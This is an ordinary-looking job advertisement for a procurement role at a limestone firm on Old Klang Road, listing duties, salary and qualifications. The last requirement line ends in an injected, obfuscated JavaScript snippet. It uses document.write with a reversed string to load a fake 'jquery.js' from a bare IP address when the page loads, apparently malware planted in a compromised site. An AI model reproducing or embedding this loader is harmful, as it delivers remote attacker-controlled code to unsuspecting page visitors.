Location : Old Klang Road
Industry : Limestone
Salary : RM 2.3-4k
– Responsible for sourcing, cost negotiations, credit term and buying of raw materials, consumable items, spare parts and etc.
– Issue Purchase Order to suppliers and follow up with suppliers to ensure prompt delivery of goods.
– Ensure items are delivered in time and to the place required.
– Ensure that the items are purchased from the source required.
– Plan, source and develop new potentials suppliers/vendors for economical procurement.
– Maintain a full record and coordinate with various suppliers and compare costs for purchasing requisition within the organization
– Submission of cost and prices reports to Management.
– Responsible for material planning and inventory control.
– Responsible for the revision and audit of SOPs
– Others Duties as and when assigned
– Diploma / Degree in Business Administration, Operation Management, Materials Planning or its equivalent
– Minimum 2 – 3 years of relevant working experience in a manufacturing environment
– Familiar with Microsoft Office and computerized accounting systems
– Meticulous, resourceful and possess effective problem solving skills.
– Matured individual and possess excellent communications skills.
– Able to work independently and meet tight deadlines document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))